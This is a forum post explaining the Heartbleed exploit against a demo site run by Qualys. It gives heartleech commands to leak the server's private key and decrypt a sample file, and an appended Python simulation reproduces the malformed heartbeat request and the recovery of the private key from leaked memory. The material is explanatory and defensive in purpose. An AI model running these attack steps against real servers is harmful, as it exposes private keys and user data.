
HeartBleed: exploit process explained against test website

Question asked by Nicola Bressan on May 2, 2014

Here's how the Heartbleed exploit can be used against a website.


Testing target (kindly provided by Qualys): https://hbdemo.kandek.com


heartleech_1b.png


After registering on this website, a user can freely download an encrypted file: supersecret.txt.enc (example file, secret because it is encrypted with the private key of the webserver).


heartleech_1a.png


An attacker can use a simple tool like heartleech (https://github.com/robertdavidgraham/heartleech) to attack the website.


So the first step is: download the tool (git clone the project or simply compile the heartbleed.c, following the instructions on the website above).


After getting the tool, we see that there are different working modes:


./heartleech target_site --dump file


will continuously send malicious Heartbleed packets to the webserver, collecting more and more memory dumps in a file that can be analyzed later...


./heartleech target_site --autopwn


will instead automatically fetch the certificate from the website and then keep downloading data until it finds a matching private key within the leaked Heartbleed data.


We are more interested in this auto mode.


So running:


./heartleech hbdemo.kandek.com --autopwn


in a terminal will return the private key. Great find!


heartleech_1.png


Having the private key, we just need to save it in a file, called for example private.key (great imagination), and extracting the data from the secret file we downloaded before is just a matter of one command:


heartleech_2.png


So the secured content of the file is now decrypted; the secret phrase is:


Darth Vader is Luke's father.

and Leia is Luke's sister.


This is amazingly simple, go and try it yourself!


I would like to thank Qualys for providing the target for live testing and Wolfgang Kandek for providing the interesting webinar "A Post-Mortem on Heartbleed - What Worked and What Didn't" still available for playback at http://event.qualys.com/797ENI74200015u00aTee00
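Added example (not part of the original post, and not code from heartleech): a self-contained Python simulation of what the two modes above are doing. It builds a heartbeat request whose claimed payload length is far larger than the real payload, runs it against a model of the pre-1.0.1g OpenSSL handler (and against the fixed one, which discards it), then does what --autopwn does with each dump: slides a window the size of one RSA prime over the leaked bytes and tests whether it divides the modulus from the certificate. The key material (two small Mersenne primes), the fake heap layout, and the "secret file" (textbook RSA with no padding) are all constructed for the demo and are assumptions, not the real hbdemo.kandek.com key or file.

```python
import random
import struct

# Constructed demo key (NOT a real key): two known Mersenne primes, far too
# small for real use but enough to exercise the same arithmetic as a 2048-bit key.
P = (1 << 127) - 1
Q = (1 << 107) - 1
N = P * Q          # this is what the attacker reads out of the certificate
E = 65537

HB_REQUEST, HB_RESPONSE = 1, 2
LIMB = 8           # OpenSSL BIGNUM limb size on 64-bit hosts (assumed x86-64 layout)


def heartbeat_request(claimed_len, payload=b"hb"):
    """Heartbeat message body: type, 16-bit claimed payload length, payload.
    The attack lies about the length: claimed_len is much bigger than len(payload)."""
    return struct.pack(">BH", HB_REQUEST, claimed_len) + payload


def build_process_memory(request, seed=1):
    """Constructed fake heap: junk, the received record, more junk, then a copy of
    the RSA prime p laid out the way OpenSSL keeps a BIGNUM (little-endian limbs)."""
    rnd = random.Random(seed)
    junk = lambda n: bytes(rnd.getrandbits(8) for _ in range(n))
    record_offset = 4096
    mem = (junk(record_offset) + request + junk(1500)
           + P.to_bytes(2 * LIMB, "little") + junk(70000))
    return mem, record_offset


def vulnerable_heartbeat(mem, off):
    """Pre-1.0.1g tls1_process_heartbeat: trusts the claimed length and copies that
    many bytes starting at the payload, so the reply spills adjacent heap memory."""
    hb_type, claimed = struct.unpack(">BH", mem[off:off + 3])
    if hb_type != HB_REQUEST:
        return None
    return struct.pack(">BH", HB_RESPONSE, claimed) + mem[off + 3:off + 3 + claimed]


def patched_heartbeat(mem, off, record_len):
    """The fix: drop the request unless type + length + payload + 16 bytes of
    padding actually fit inside the record that was received."""
    hb_type, claimed = struct.unpack(">BH", mem[off:off + 3])
    if hb_type != HB_REQUEST or 1 + 2 + claimed + 16 > record_len:
        return None
    return struct.pack(">BH", HB_RESPONSE, claimed) + mem[off + 3:off + 3 + claimed]


def find_prime_factor(dump, n):
    """The --autopwn idea: slide a window the size of one prime over the dump,
    try both byte orders, and keep the first value that divides the modulus."""
    plen = ((n.bit_length() + 1) // 2 + 7) // 8
    plen = (plen + LIMB - 1) // LIMB * LIMB        # BIGNUMs are padded to whole limbs
    for off in range(len(dump) - plen + 1):
        for order in ("little", "big"):
            cand = int.from_bytes(dump[off:off + plen], order)
            if 1 < cand < n and n % cand == 0:
                return cand
    return None


def recover_private_key(n, e, p):
    """One prime is enough: q = n / p and d = e^-1 mod (p-1)(q-1) give the full key."""
    q = n // p
    d = pow(e, -1, (p - 1) * (q - 1))
    return p, q, d


def run_attack(secret=b"Darth Vader is Luke's father."):
    """End to end: leak memory, find p, derive d, decrypt the constructed 'secret file'."""
    ciphertext = pow(int.from_bytes(secret, "big"), E, N)   # textbook RSA, no padding
    request = heartbeat_request(0xFFFF)                      # claim 64 KiB, send 2 bytes
    mem, off = build_process_memory(request)
    assert patched_heartbeat(mem, off, len(request)) is None  # fixed server says nothing
    dump = vulnerable_heartbeat(mem, off)[3:]                 # strip type + length
    p = find_prime_factor(dump, N)
    if p is None:
        return None
    _, _, d = recover_private_key(N, E, p)
    m = pow(ciphertext, d, N)
    return m.to_bytes((m.bit_length() + 7) // 8, "big")


if __name__ == "__main__":
    print(run_attack())
```

Two things worth noticing when reading it against the post: the prime scan needs only the public modulus, which is why --autopwn starts by fetching the certificate, and a single hit on either prime is enough to write out the whole private key. With a real 2048-bit key the window is 128 bytes and the dump is up to 64 KiB per heartbeat, which is why the tool keeps sending requests until one of them happens to cover the BIGNUM on the heap.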
